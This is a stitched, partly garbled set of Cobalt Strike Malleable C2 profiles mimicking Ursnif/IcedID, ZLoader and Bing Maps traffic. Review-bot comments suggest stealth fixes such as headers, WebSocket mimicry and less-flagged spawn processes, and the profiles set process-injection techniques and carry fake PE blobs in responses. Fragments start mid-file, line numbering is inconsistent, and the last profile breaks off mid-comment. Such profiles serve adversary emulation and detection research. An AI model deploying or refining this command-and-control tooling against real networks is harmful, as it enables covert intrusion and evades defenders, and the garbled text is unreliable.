106 | header "Server" "nginx"; | |
107 | header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; | |
108 | header "Content-Type" "text/html; charset=utf-8"; | |
109 | header "Connection" "keep-alive"; | |
110 | ||
111 | } | |
112 | ||
113 | ||
114 | } |
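Review bot: The response header `"Date" "Fri, 30 Jun 2017 13:08:47 GMT"` is hard-coded at 37, 92 and 107, so every reply carries the same timestamp years in the past, which any proxy or NSM that compares Date against wall-clock time can flag; unless the team server is known to override it, drop the line and let the server stamp the real date, or mark it with `# static Date copied from the 2017 capture - replace or remove before use`. `header "Host" "203.150.19.63:443"` at 19 is likewise a literal IP and port that will not match the listener actually contacted; the ursnif profile in this set already carries a `#prob have to change Host header` warning and the same note belongs here. The 404 decoy at 44–53 closes `</html>` twice and opens `<!CDATA['=` rather than `<![CDATA[`, which may be faithful to the sample but deserves a comment so nobody "fixes" it without checking the pcap.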
0 | #ursnif_IcedID malware profile | |
1 | #https://www.malware-traffic-analysis.net/2018/11/08/index.html | |
2 | #xx0hcd | |
3 | ||
4 | ||
5 | set sleeptime "30000"; | |
6 | set jitter "20"; | |
7 | set useragent "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"; | |
8 | set dns_idle "8.8.8.8"; | |
9 | set maxdns "235"; | |
10 | set sample_name "urnif_IcedID profile"; | |
11 | ||
12 | ||
13 | #https-certificate { | |
14 | # set keystore "demo.store"; | |
15 | # set password "whateverpass"; | |
16 | #} | |
17 | ||
18 | ||
19 | #prob have to change Host header to something legit depending on testing. | |
20 | http-get { | |
21 | ||
22 | set uri "/images/U2gVFoeT1Sh8s/"; | |
23 | ||
24 | client { | |
25 | ||
26 | header "Host" "jititliste.com"; | |
27 | header "Accept" "text/html, application/xhtml+xml, */*"; | |
28 | header "Accept-Language" "en-US"; | |
29 | header "DNT" "1"; | |
30 | header "Connection" "Keep-Alive"; | |
31 | ||
32 | ||
33 | metadata { | |
34 | netbios; | |
35 | parameter "id"; | |
36 | ||
37 | } | |
38 | ||
39 | } | |
40 | ||
41 | server { | |
42 | ||
43 | header "Server" "Apache/2.2.22 (Debian)"; | |
44 | header "X-Powered-By" "PHP/5.4.45-0+deb7u14"; | |
45 | header "Pragma" "no-cache"; | |
46 | header "Set-Cookie" "lang=en; expires=Sat, 08-Dec-2018 15:50:58 GMT; path=/; domain=.jititliste.com; id="; | |
47 | header "Vary" "Accept-Encoding"; | |
48 | header "Keep-Alive" "timeout=5, max=100"; | |
49 | header "Connection" "Keep-Alive"; | |
50 | header "Content-Type" "text/html"; | |
51 | ||
52 | ||
53 | ||
54 | ||
55 | ||
56 | #using newline ("\n") shows as a period (".") in c2lint, but looks correct in wireshark. | |
57 | output { | |
58 | ||
59 | netbios; | |
60 | prepend "1faa\n"; | |
61 | print; | |
62 | ||
63 | } | |
64 | } | |
65 | } | |
66 | ||
67 | http-post { | |
68 | ||
69 | set verb "GET"; | |
70 | set uri "/data2.php"; | |
71 | ||
72 | client { | |
73 | ||
74 | header "Host" "themiole.biz"; | |
75 | header "Upgrade" "websocket"; | |
76 | header "Connection" "Upgrade"; | |
77 | ||
78 | output { | |
79 | netbios; | |
80 | prepend "PHPSESSID="; | |
81 | header "Cookie"; | |
82 | ||
83 | ||
84 | } | |
85 | ||
86 | ||
87 | id { | |
88 | netbios; | |
89 | parameter ""; | |
90 | ||
91 | ||
92 | } | |
93 | } | |
94 | ||
95 | server { | |
96 | ||
97 | header "Server" "openresty"; | |
98 | header "Connection" "upgrade"; | |
99 | header "Sec-Websocket-Accept" "Kfh9QIsMVZc16xEPYxPHzW8SZ8w-"; | |
100 | header "Upgrade" "websocket"; | |
101 | ||
102 | ||
103 | ||
104 | output { | |
105 | netbios; | |
106 | prepend "."; | |
107 | prepend "..NPyo=....\n"; | |
108 | append ".......... .......... .........."; | |
109 | print; | |
110 | } | |
111 | } | |
112 | } | |
113 | ||
114 | http-stager { | |
115 | ||
116 | set uri_x86 "/WES/Fatog.php"; | |
117 | set uri_x64 "/WES/fatog.php"; | |
118 | ||
119 | client { | |
120 | header "Host" "mnesenesse.com"; | |
121 | header "Connection" "Keep-Alive"; | |
122 | } | |
123 | ||
124 | server { | |
125 | header "Server" "Apache/2.2.15 (CentOS)"; | |
126 | header "X-Powered-By" "PHP/7.2.11"; | |
127 | header "Content-Discription" "File Transfer"; | |
128 | header "Content-Disposition" "attachment; filename=\"ledo2.xap\""; | |
129 | header "Content-Type" "application/octet-stream"; | |
130 | header "Cache-Control" "must-revalidate"; | |
131 | header "Connection" "close"; | |
132 | ||
133 | } | |
134 | ||
135 | ||
136 | } | |
137 | ||
138 | ||
139 | stage { | |
140 | set checksum "0"; | |
141 | set compile_time "12 Jun 2018 11:22:23"; | |
142 | set image_size_x86 "543900"; | |
143 | set image_size_x64 "543900"; | |
144 | transform-x86 { | |
145 | strrep "beacon.dll" ""; | |
146 | } | |
147 | transform-x64 { | |
148 | strrep "beacon.x64.dll" "aoushdquwe.exe"; | |
149 | } | |
150 | ||
151 | } | |
152 | ||
153 |
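Review bot: The http-post client at 74–76 sends `Upgrade: websocket` and `Connection: Upgrade` without a `Sec-WebSocket-Key` or `Sec-WebSocket-Version`, and the server at 99 answers with a fixed `Sec-Websocket-Accept` on what is still an ordinary response with a body; any middlebox that validates WebSocket handshakes will see a malformed upgrade, so either add the client key headers or drop the upgrade mimicry and keep the cookie-based post. `parameter "";` at 89 gives the session id an empty query-string key (presumably yielding `/data2.php?=<id>`), which is a distinctive artifact; if the sample really used a bare value, say so in a comment, otherwise name the parameter. The `Set-Cookie` at 46 hard-codes `expires=Sat, 08-Dec-2018` and `domain=.jititliste.com`, so a conforming client would discard it and every reply shows a stale cookie; the same per-engagement caveat the comment at 19 gives for the Host header applies here. Minor: `sample_name` at 10 reads `urnif_IcedID` (missing the `s`), and `Content-Discription` at 127 is misspelled; if the latter mirrors the sample, note that in a comment.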
0 | #zloader.profile | |
1 | #https://app.any.run/tasks/7c83ff58-4c40-4a41-958b-d9279b917f2b/ | |
2 | #https://blog.malwarebytes.com/cybercrime/2017/01/zbot-with-legitimate-applications-on-board/ | |
3 | ||
4 | #xx0hcd | |
5 | ||
6 | ###Global Options### | |
7 | set sample_name "zloader.profile"; | |
8 | ||
9 | set sleeptime "37500"; | |
10 | set jitter "26"; | |
11 | set useragent "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.88 Safari/537.36"; | |
12 | ||
13 | set host_stage "true"; | |
14 | ||
15 | ###DNS options### | |
16 | set dns_idle "8.8.8.8"; | |
17 | set maxdns "245"; | |
18 | set dns_sleep "0"; | |
19 | set dns_stager_prepend ""; | |
20 | set dns_stager_subhost ""; | |
21 | set dns_max_txt "252"; | |
22 | set dns_ttl "1"; | |
23 | ||
24 | ###SMB options### | |
25 | set pipename "ntsvcs"; | |
26 | set pipename_stager "scerpc"; | |
27 | ||
28 | ###TCP options### | |
29 | set tcp_port "8000"; | |
30 | ||
31 | ###SSL Options### | |
32 | ||
33 | #https-certificate { | |
34 | #set keystore ""; | |
35 | #set password ""; | |
36 | #} | |
37 | ||
38 | #https-certificate { | |
39 | # set C "US"; | |
40 | # set CN "whatever.com"; | |
41 | # set L "California"; | |
42 | # set O "whatever LLC."; | |
43 | # set OU "local.org"; | |
44 | # set ST "CA"; | |
45 | # set validity "365"; | |
46 | #} | |
47 | ||
48 | #code-signer { | |
49 | #set keystore "your_keystore.jks"; | |
50 | #set password "your_password"; | |
51 | #set alias "server"; | |
52 | #} | |
53 | ||
54 | ###HTTP-Config Block### | |
55 | #http-config { | |
56 | # set headers "Server, Content-Type"; | |
57 | # header "Content-Type" "text/html;charset=UTF-8"; | |
58 | # header "Server" "nginx"; | |
59 | # | |
60 | # set trust_x_forwarded_for "false"; | |
61 | #} | |
62 | ||
63 | ###HTTP-GET Block### | |
64 | ||
65 | http-get { | |
66 | ||
67 | set uri "/wp-content/themes/calliope/wp_data.php"; | |
68 | ||
69 | client { | |
70 | ||
71 | header "Accept" "*/*"; | |
72 | header "Host" "wmwifbajxxbcxmucxmlc.com"; | |
73 | header "Connection" "Keep-Alive"; | |
74 | ||
75 | ||
76 | metadata { | |
77 | ||
78 | base64url; | |
79 | prepend "SESSIONID="; | |
80 | header "Cookie"; | |
81 | ||
82 | } | |
83 | ||
84 | } | |
85 | ||
86 | server { | |
87 | header "Server" "nginx"; | |
88 | header "Content-Type" "application/x-msdos-program"; | |
89 | header "Connection" "close"; | |
90 | header "Last-Modified" "Fri, 24 Apr 2020 23:06:05 GMT"; | |
91 | header "ETag" "\"76200-5a41168e83140\""; | |
92 | header "Accept-Ranges" "bytes"; | |
93 | ||
94 | output { | |
95 | ||
96 | netbios; | |
97 | ||
98 | prepend "MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. | |
99 | ||
100 | $.......PE..L...$..^...........!................9+....................................................@..................................$..P.......X...............................8...............................@............................................text............................... ..`.rdata..6N.......P..................@[email protected]...`[email protected]............@..............@[email protected]..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................h.........Y.....h.........Y.....h.........Y......D$..V........t V..........^.....D$..T$....H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2.....................D$.;H.u | |
101 | ..;D$.u......2...........4.............QV.t$..D$...........t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^Y.........4.............Q.D$...$....V.t$....u&j..F........F.....h.4......K.....^Y...PV.=.....^Y...........5.............QV.t$..D$......P....t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^[email protected]..^[email protected]..^.......... | |
102 | 'R.......S...C..V.5 C..+....L$...C... | |
103 | ,R.........+R.....f.D$..P...W.="; | |
104 | ||
105 | append "p....D$...C.....C...D$$6....L$..........;.r.(.\"R.....+........@+....C....+.+.........5 C....!...u....C..k..+...U....+....f9T$.w............$R....E.......C..k | |
106 | .C.....v+..C...D$...C...D$..8....D$.+...C.......:.........&R.... | |
107 | \"R..........u...C....E......C.........* | |
108 | .C......L$.. | |
109 | ,R....@+ | |
110 | .C... | |
111 | .C.... | |
112 | 0R..It6..*t(......t............C.....D$.....:..C... .\\$............u...][email protected]..+\\$....L$.*.....L$.. | |
113 | ,R....@+......C...|$ Z...u... | |
114 | (R....+.......5 C...L$...T. | |
115 | ..|$ Z....9u... | |
116 | (R....+.......5 C...D$....@+L$..L$$....L$........=p..._^[...............S.$.U.l$.VW.{...;.......+.9|$..B|$.;.u.../9F........~...F.r...U......j......_..^][.............F.;.s..v.W.A.....tj.{..r....~..r*...(..u..~....r..._.....^][..._..^][..........t.W..+PQ.........~...~.r.....8..._^][.......8._..^][...hd........hd........hT....j...............S.\\$.V....tW.N....r.......;.rE...r........F...;.v1...r..t$.....+.SV.....^[....t$.....+.SV.....^[...W.|$....wz.F.;.s..v...W.!.....t\\.~..r(...&..u..~....r | |
117 | .._.....^[....._^[..........t.WSP.........~...~.r.....8..._^[.......8._..^[...hT....m..................V...L$.W.~.;.r{.T$...+.;.w!.~...N.r | |
118 | .._......^....._^.........tC.~..r.......+.S.....+.t.P...PS.........~...~.[r | |
119 | ....8..._^.......8._..^...hd....................U..j.h@...d.....P...SVW..0..3.P.E.d......e....u..E.........v....'.^..............;.v.......<.+.;.v.......O..E.....3..E...tF...w.Q.........E...u1......E..M..E.@.e.P.E........E..%.....}..E..u..E..]...tH.~..r1.../.u..~..r | |
120 | .6........j..F......F.....j.............t.SQP.........~..r | |
121 | .6.........E.......~..^....r........M.d. | |
122 | ....Y_^[..].......D$.3...t....w.P.,..........t............U...=..........t..M.9.t | |
123 | ....x..u.3.]..@.].U...=,.....(...t..M.9.t | |
124 | ....x..u.3.]..@.].U..V.u...............^]...U..V.u....A...........^]...U..V.u....&...........^]...U..V.u..........(.....^]...................U..V..............E..t.V.I...Y..^]...U..V........E..t.V.*...Y..^]...U.....j..E..E.....P.M..t...h.....E..E.....P.>....U......E..M..E..E.P.!...h.....E..E.....P......U......E..M..E..E.P.....h.....E..E.(...P......;"; | |
125 | ||
126 | print; | |
127 | } | |
128 | } | |
129 | } | |
130 | ||
131 | #HTTP-GET VARIANT | |
132 | http-get "variant_april24dll" { | |
133 | ||
134 | set uri "/files/april24.dll"; | |
135 | ||
136 | client { | |
137 | ||
138 | header "Accept" "*/*"; | |
139 | header "Host" "wmwifbajxxbcxmucxmlc.com"; | |
140 | header "Connection" "Keep-Alive"; | |
141 | ||
142 | ||
143 | metadata { | |
144 | ||
145 | base64url; | |
146 | prepend "SESSIONID="; | |
147 | header "Cookie"; | |
148 | ||
149 | } | |
150 | ||
151 | } | |
152 | ||
153 | server { | |
154 | header "Server" "nginx"; | |
155 | header "Content-Type" "application/x-msdos-program"; | |
156 | header "Connection" "close"; | |
157 | header "Last-Modified" "Fri, 24 Apr 2020 23:06:05 GMT"; | |
158 | header "ETag" "\"76200-5a41168e83140\""; | |
159 | header "Accept-Ranges" "bytes"; | |
160 | ||
161 | output { | |
162 | ||
163 | netbios; | |
164 | ||
165 | prepend "MZ......................@............................................. .!..L.!This program cannot be run in DOS mode. | |
166 | ||
167 | $.......PE..L...$..^...........!................9+....................................................@..................................$..P.......X...............................8...............................@............................................text............................... ..`.rdata..6N.......P..................@[email protected]...`[email protected]............@..............@[email protected]..............@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................h.........Y.....h.........Y.....h.........Y......D$..V........t V..........^.....D$..T$....H.......T$.....t$.R.P..T$..H.;J.u...;.u.........2.....................D$.;H.u | |
168 | ..;D$.u......2...........4.............QV.t$..D$...........t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^Y.........4.............Q.D$...$....V.t$....u&j..F........F.....h.4......K.....^Y...PV.=.....^Y...........5.............QV.t$..D$......P....t$........4...E..F......F.........:.u.3.QR.........^Y.....W.y...A..u.+._QR.........^[email protected]..^[email protected]..^.......... | |
169 | 'R.......S...C..V.5 C..+....L$...C... | |
170 | ,R.........+R.....f.D$..P...W.="; | |
171 | ||
172 | append "p....D$...C.....C...D$$6....L$..........;.r.(.\"R.....+........@+....C....+.+.........5 C....!...u....C..k..+...U....+....f9T$.w............$R....E.......C..k | |
173 | .C.....v+..C...D$...C...D$..8....D$.+...C.......:.........&R.... | |
174 | \"R..........u...C....E......C.........* | |
175 | .C......L$.. | |
176 | ,R....@+ | |
177 | .C... | |
178 | .C.... | |
179 | 0R..It6..*t(......t............C.....D$.....:..C... .\\$............u...][email protected]..+\\$....L$.*.....L$.. | |
180 | ,R....@+......C...|$ Z...u... | |
181 | (R....+.......5 C...L$...T. | |
182 | ..|$ Z....9u... | |
183 | (R....+.......5 C...D$....@+L$..L$$....L$........=p..._^[...............S.$.U.l$.VW.{...;.......+.9|$..B|$.;.u.../9F........~...F.r...U......j......_..^][.............F.;.s..v.W.A.....tj.{..r....~..r*...(..u..~....r..._.....^][..._..^][..........t.W..+PQ.........~...~.r.....8..._^][.......8._..^][...hd........hd........hT....j...............S.\\$.V....tW.N....r.......;.rE...r........F...;.v1...r..t$.....+.SV.....^[....t$.....+.SV.....^[...W.|$....wz.F.;.s..v...W.!.....t\\.~..r(...&..u..~....r | |
184 | .._.....^[....._^[..........t.WSP.........~...~.r.....8..._^[.......8._..^[...hT....m..................V...L$.W.~.;.r{.T$...+.;.w!.~...N.r | |
185 | .._......^....._^.........tC.~..r.......+.S.....+.t.P...PS.........~...~.[r | |
186 | ....8..._^.......8._..^...hd....................U..j.h@...d.....P...SVW..0..3.P.E.d......e....u..E.........v....'.^..............;.v.......<.+.;.v.......O..E.....3..E...tF...w.Q.........E...u1......E..M..E.@.e.P.E........E..%.....}..E..u..E..]...tH.~..r1.../.u..~..r | |
187 | .6........j..F......F.....j.............t.SQP.........~..r | |
188 | .6.........E.......~..^....r........M.d. | |
189 | ....Y_^[..].......D$.3...t....w.P.,..........t............U...=..........t..M.9.t | |
190 | ....x..u.3.]..@.].U...=,.....(...t..M.9.t | |
191 | ....x..u.3.]..@.].U..V.u...............^]...U..V.u....A...........^]...U..V.u....&...........^]...U..V.u..........(.....^]...................U..V..............E..t.V.I...Y..^]...U..V........E..t.V.*...Y..^]...U.....j..E..E.....P.M..t...h.....E..E.....P.>....U......E..M..E..E.P.!...h.....E..E.....P......U......E..M..E..E.P.....h.....E..E.(...P......;"; | |
192 | ||
193 | print; | |
194 | } | |
195 | } | |
196 | } | |
197 | ||
198 | ###HTTP-Post Block### | |
199 | ||
200 | #parameters from a similar sample = https://github.com/tatsui-geek/malware-traffic-analysis.net/blob/master/2016-12-30-Sundown-EK-1st-run-sends-Terdot.A-Zloader.pcap | |
http-post {

    set uri "/post.php";
    #set verb "GET";
    set verb "POST";

    client {

        header "Accept" "*/*";
        header "Cache-Control" "no-cache";
        # NOTE(review): Host is pinned to the domain taken from the referenced ZLoader
        # sample rather than to the listener's own hostname, so every beacon request
        # carries this literal value whatever domain the implant actually connects to.
        # Confirm this is intended before fronting the listener with a real domain or
        # redirector (a mismatched Host is both a fingerprint and a routing problem).
        header "Host" "wmwifbajxxbcxmucxmlc.com";
        header "Connection" "close";

        # Beacon output: base64url-encoded and stored in the "FE8hVs3" parameter.
        # NOTE(review): `parameter` is a URI-parameter terminator, so the output rides
        # in the query string even though the verb is POST; large task output will be
        # bounded by URL length. Verify c2lint accepts this combination for your version.
        output {
            base64url;
            parameter "FE8hVs3";

        }

        # Session id: base64url-encoded, sent as the "id" URI parameter.
        id {
            base64url;
            parameter "id";

        }
    }

    server {

        header "Server" "nginx";
        header "Content-Type" "text/html; charset=UTF-8";
        header "Connection" "close";

        # Reply to the beacon is netbios-encoded and sandwiched between two
        # opaque byte blobs (lifted from the sample's response body) so the
        # body looks like the original encrypted traffic rather than plain text.
        output {
            netbios;

            prepend "..\"N ......0.9..5......Tb....\"shb.fL.....t....u.......s...D.{...Qv&[email protected]$..y.q,P....Nn~..O .[..Lo..{.Z.....yKd.B..o.M>..J...~n.D0..Bm.:.Tx... [email protected]..!.%...BC.\\I.7C..U..X..D.4....h........'m......gXaQ..<.....X..]...%5.Fx.LO..D._I~.@$.R[..p...<";

            append ">2...........{..\"..~=....._...Nu...s.mm.....u..lV..r......g2)r.w.'G2.*Y.i.,.9...o...t..zhX.h....K=........AS";

            print;
        }
    }
}
245 | ||
246 | ###HTTP-Stager Block### | |
http-stager {

    # Staging URIs, one per architecture. The stager itself is the
    # unencrypted, unauthenticated download of the full Beacon, so these
    # paths are only reachable if staging is enabled on the listener.
    set uri_x86 "/wp-content/themes/wp-front.php";
    set uri_x64 "/wp-content/themes/wp_data.php";

    client {

        # NOTE(review): same hard-coded sample domain as the http-post block;
        # it is sent verbatim as the Host header of every stager request.
        header "Host" "wmwifbajxxbcxmucxmlc.com";
        header "Connection" "Keep-Alive";

    }

    server {

        header "Server" "nginx";
        header "Content-Type" "text/html; charset=UTF-8";
        header "Connection" "close";

        # Stage is returned as-is in the body (no encoding/wrapping), which
        # means the raw Beacon DLL is observable on the wire at stage time.
        output {

            print;
        }

    }
}
272 | ||
273 | ||
274 | ###Malleable PE/Stage Block### | |
275 | ||
276 | #filled this out best I could. | |
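stage {
    # PE header values for the reflectively-loaded Beacon image.
    set checksum "0";
    set compile_time "16 Apr 2020 17:56:00";
    set entry_point "170000";
    set image_size_x86 "740000";
    set image_size_x64 "740000";
    #set name "WWanMM.dll";

    # In-memory evasion is essentially switched off here: no RW->RX flip
    # avoidance beyond userwx, no reflective-loader cleanup, no sleep-time
    # masking, no PE stomping, no string obfuscation. That keeps Beacon's
    # plaintext strings and its loader resident in memory for the lifetime
    # of the session; acceptable for an emulation profile, not for opsec.
    set userwx "false";
    set cleanup "false";
    set sleep_mask "false";
    set stomppe "false";
    set obfuscate "false";
    set rich_header "";

    # (duplicate `set sleep_mask "false";` removed; it restated the value above)

    # Module stomping is disabled; enable both lines together if used.
    #set module_x86 "wwanmm.dll";
    #set module_x64 "wwanmm.dll";

    transform-x86 {
        #prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon.dll" "";
    }

    transform-x64 {
        #prepend "\x90\x90\x90";
        strrep "ReflectiveLoader" "";
        strrep "beacon.x64.dll" "";
    }

    # NOTE(review): per the author's comment these were copied from a ZLoader
    # YARA rule. `string` adds the literal ASCII text of the quoted value to
    # the image, so what lands in memory is the text "{EE 03 00 00 ...}" (and
    # the "??" wildcards), not the byte sequence the YARA hex pattern matches.
    # If the intent is to trigger that rule, the bytes would have to be written
    # as raw bytes; if it is not, these only add two very recognisable strings.
    # Also note the second literal spans a line break, so a trailing newline
    # is part of the string that gets embedded.
    #from yara strings = https://github.com/k-vitali/Malware-Misc-RE/blob/master/2020-03-20-zloader-generic-yara-vk.yar
    string "{EE 03 00 00 E9 03 00 00 EE 03 00 00 EF 03 00 00 F0 03 00 00 EE 03 00 00 EE 03 00 00 EA 03 00 00 EC 03 00 00 EB 03 00 00 ED 03 00 00}";
    string "{55 89 e5 53 57 56 8b ?? ?? 85 f6 74 ?? 8b ?? ?? 6a 00 53 e8 ?? ?? ?? ?? 83 c4 08 a8 01 75 ?? 8b ?? ?? ?? ?? ?? 89 f9 e8 ?? ?? ?? ?? 89 c1 0f ?? ?? 66 ?? ?? 66 ?? ?? 74 ?? bb 01 00 00 00 eb ?? 89 d8 99 f7 f9 0f ?? ?? ?? 8b ?? ?? 66 ?? ?? ?? 66 ?? ?? ?? 8d ?? ?? 74 ?? 8d ?? ?? 66 83 fa 5f 72 ?? 66 83 f8 0d 77 ?? ba 00 26 00 00 0f a3 c2 72 ?? eb ?? 31 f6 eb ?? 89 de eb ?? 8b ?? ?? 89 f0 5e 5f 5b 5d c3}
";

}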
314 | ||
315 | ###Process Inject Block### | |
process-inject {

    # No allocator is set, so the vendor default applies (VirtualAllocEx per
    # the Cobalt Strike docs); the section-mapping alternative is left disabled.
    #set allocator "NtMapViewOfSection";

    set min_alloc "16700";

    # Injected memory is never left RWX, and is not allocated RWX initially either.
    set userwx "false";

    set startrwx "false";

    transform-x86 {
        #prepend "\x90\x90\x90";
    }
    transform-x64 {
        #prepend "\x90\x90\x90";
    }

    # Thread-creation techniques Beacon may use when injecting. The bare
    # CreateThread/CreateRemoteThread entries start the thread directly at
    # the injected buffer; the quoted variants spoof the start address to a
    # legitimate export plus an offset. NOTE(review): vendor docs describe the
    # list as tried in order until one applies to the target, so the plain
    # (most-signatured) forms being first is presumably deliberate for an
    # emulation profile; confirm the ordering is what you want.
    execute {
        CreateThread;
        CreateRemoteThread;

        CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";

        SetThreadContext;

        NtQueueApcThread-s;

        #NtQueueApcThread;

        CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";

        RtlCreateUserThread;
    }
}
350 | ||
351 | ###Post-Ex Block### | |
post-ex {

    # Sacrificial process for post-exploitation jobs. NOTE(review): an
    # explorer.exe child spawned by an arbitrary parent (and, on x64, from
    # the syswow64 copy for 32-bit jobs) is an unusual parent/child pairing
    # that endpoint tooling commonly flags; pick a process that the spawning
    # parent would plausibly start if this profile is used outside emulation.
    set spawnto_x86 "%windir%\\syswow64\\explorer.exe";
    set spawnto_x64 "%windir%\\sysnative\\explorer.exe";

    # Post-ex DLL strings are left in the clear and reflective-loader
    # references are not stripped.
    set obfuscate "false";

    set smartinject "false";

    # AMSI is not patched in the spawned process; script-based post-ex
    # (powershell/powerpick) stays visible to AMSI consumers.
    set amsi_disable "false";

}
#bing maps profile
#xx0hcd

###Global Options###
set sample_name "bing_maps.profile";

# ~38.5s callback interval with 27% jitter.
set sleeptime "38500";
set jitter "27";
set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36";

# Staging is disabled: the http-stager block further down is defined but
# the listener will not host stages, so only stageless payloads apply.
set host_stage "false";

###DNS options###
# dns_idle is the "no tasks" answer returned to the beacon; 8.8.8.8 is the
# common placeholder and is also well known to defenders as a CS default.
set dns_idle "8.8.8.8";
set maxdns "245";
set dns_sleep "0";
set dns_stager_prepend "";
set dns_stager_subhost "";
set dns_max_txt "252";
set dns_ttl "1";

###SMB options###
# Named pipes for SMB beacons. NOTE(review): "ntsvcs"/"scerpc" mimic real
# Windows RPC endpoints; several detection rules enumerate these exact names.
set pipename "ntsvcs";
set pipename_stager "scerpc";
set smb_frame_header "";

###TCP options###
set tcp_port "8000";
set tcp_frame_header "";

###SSH BANNER###
set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";

###SSL Options###
# Disabled; if enabled, do not commit the real keystore password to the
# profile (the placeholder below is an example value only).
#https-certificate {
#    set keystore "domain001.store";
#    set password "password123";
#}

#code-signer {
#set keystore "your_keystore.jks";
#set password "your_password";
#set alias "server";
#}

###HTTP-Config Block###
# Disabled. If a redirector is put in front of the team server, enable this
# block and set trust_x_forwarded_for only when that redirector rewrites the
# header; otherwise the value is attacker/client-controlled.
#http-config {
#    set headers "Server, Content-Type";
#    header "Content-Type" "text/html;charset=UTF-8";
#    header "Server" "nginx";
#
#    set trust_x_forwarded_for "false";
#}

54 | ###HTTP-GET Block### | |
http-get {

    set uri "/maps/overlaybfpr";

    client {

        header "Host" "www.bing.com";
        header "Accept" "*/*";
        header "Accept-Language" "en-US,en;q=0.5";
        header "Connection" "close";


        # Session metadata is sent in the Cookie header. Prepends apply in order,
        # so the final header is: Cookie: SRCHD=AF=NOFORM;_SS=<base64>
        # NOTE(review): plain base64 can emit '+', '/' and '=' padding, which are
        # awkward inside a cookie value; the http-post block uses base64url for the
        # same header, so aligning this to base64url would be consistent. Browsers
        # also separate cookies with "; " (semicolon-space), not a bare ";".
        metadata {
            base64;

            prepend "_SS=";
            prepend "SRCHD=AF=NOFORM;";
            header "Cookie";

        }

        # Fixed decoy query parameter, constant across all beacons.
        parameter "q" "san%20diego%20ca%20zoo";

    }

    server {

        header "Cache-Control" "public";
        header "Content-Type" "text/html;charset=utf-8";
        header "Vary" "Accept-Encoding";
        header "P3P" "\"NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND\"";
        header "X-MSEdge-Ref" "Ref A: 20D7023F4A1946FEA6E17C00CC8216CF Ref B: DALEDGE0715";
        header "Connection" "close";

        # Tasking is base64-encoded and spliced into the "id" field of the first
        # result in a captured Bing suggestions response.
        # NOTE(review): the splice point is `"id": "sid:"<data>"` followed directly
        # by `"readLink"` with no closing `"",` — unlike the later entries that
        # use `\"sid:\"...\"\",`. Starting the append with `\"\",` would keep the
        # spliced entry shaped like the real ones.
        output {

            base64;

            prepend "{
\"_type\": \"Suggestions\",
\"instrumentation\": {
\"pingUrlBase\": \"https://www.bing.com/api/ping?IG=22592B48742E48B7B855897EE3CA6400&CID=34823DAF741A65682A9032BA75E66427&ID=\",
\"pageLoadPingUrl\": \"https://www.bing.com/api/ping/pageload?IG=22592B48742E48B7B855897EE3CA6400&CID=34823DAF741A65682A9032BA75E66427&Type=Event.CPT&DATA=0\"
},
\"queryContext\": {
\"originalQuery\": \"san diego ca zoo\"
},
\"value\": [{
\"_type\": \"Place\",
\"id\": \"sid:\"";





            append "\"
\"readLink\": \"https://www.bing.com/api/v6/localentities/dbb1c326-5b67-4591-a264-0929e070e5ee\",
\"readLinkPingSuffix\": \"DevEx,5018.1\",
\"entityPresentationInfo\": {
\"entityScenario\": \"ListItem\",
\"entitySubTypeHints\": [\"PopulatedPlace\"]
},
\"geo\": {
\"latitude\": 32.7157,
\"longitude\": -117.162
},
\"address\": {
\"addressLocality\": \"San Diego\",
\"addressSubregion\": \"San Diego County\",
\"addressRegion\": \"California\",
\"addressCountry\": \"United States\",
\"countryIso\": \"US\",
\"text\": \"San Diego, California\"
},
\"formattingRuleId\": \"US\"
}, {
\"_type\": \"LocalBusiness\",
\"id\": \"local_ypid:\"YN873x13020856635161814\"\",
\"readLink\": \"https://www.bing.com/api/v6/localbusinesses/YN873x13020856635161814\",
\"readLinkPingSuffix\": \"DevEx,5019.1\",
\"name\": \"San Diego Zoo\",
\"geo\": {
\"latitude\": 32.7353,
\"longitude\": -117.149
},
\"address\": {
\"streetAddress\": \"2920 Zoo Dr\",
\"addressLocality\": \"San Diego\",
\"addressRegion\": \"CA\",
\"postalCode\": \"92101\",
\"addressCountry\": \"United States\",
\"countryIso\": \"US\",
\"text\": \"2920 Zoo Dr, San Diego, CA 92101\"
},
\"formattingRuleId\": \"US\",
\"categories\": [\"90000.90001.90012.90017\"]
}, {
\"_type\": \"Place\",
\"id\": \"sid:\"63101d85-2568-910b-fee1-2518175b6a48\"\",
\"readLink\": \"https://www.bing.com/api/v6/localentities/63101d85-2568-910b-fee1-2518175b6a48\",
\"readLinkPingSuffix\": \"DevEx,5020.1\",
\"entityPresentationInfo\": {
\"entityScenario\": \"ListItem\",
\"entitySubTypeHints\": [\"PopulatedPlace\"]
},
\"geo\": {
\"latitude\": 10.2573,
\"longitude\": -67.9548
},
\"address\": {
\"addressLocality\": \"San Diego\",
\"addressRegion\": \"Carabobo\",
\"addressCountry\": \"Venezuela\",
\"countryIso\": \"VE\",
\"text\": \"San Diego, Carabobo\"
}";


            print;
        }
    }
}
177 | ||
178 | ||
179 | ||
180 | ###HTTP-Post Block### | |
http-post {

    set uri "/fd/ls/lsp.aspx";
    #set verb "GET";
    set verb "POST";

    client {

        header "Host" "www.bing.com";
        header "Accept" "*/*";
        header "Accept-Language" "en-US";
        header "Content-Type" "text/xml";
        header "Connection" "close";

        # Beacon output is base64url-encoded and carried in the Cookie header
        # (final form: Cookie: SRCHD=AF=NOFORM;SRCHUID=<base64url>). Note the
        # request declares Content-Type text/xml but, with this terminator, the
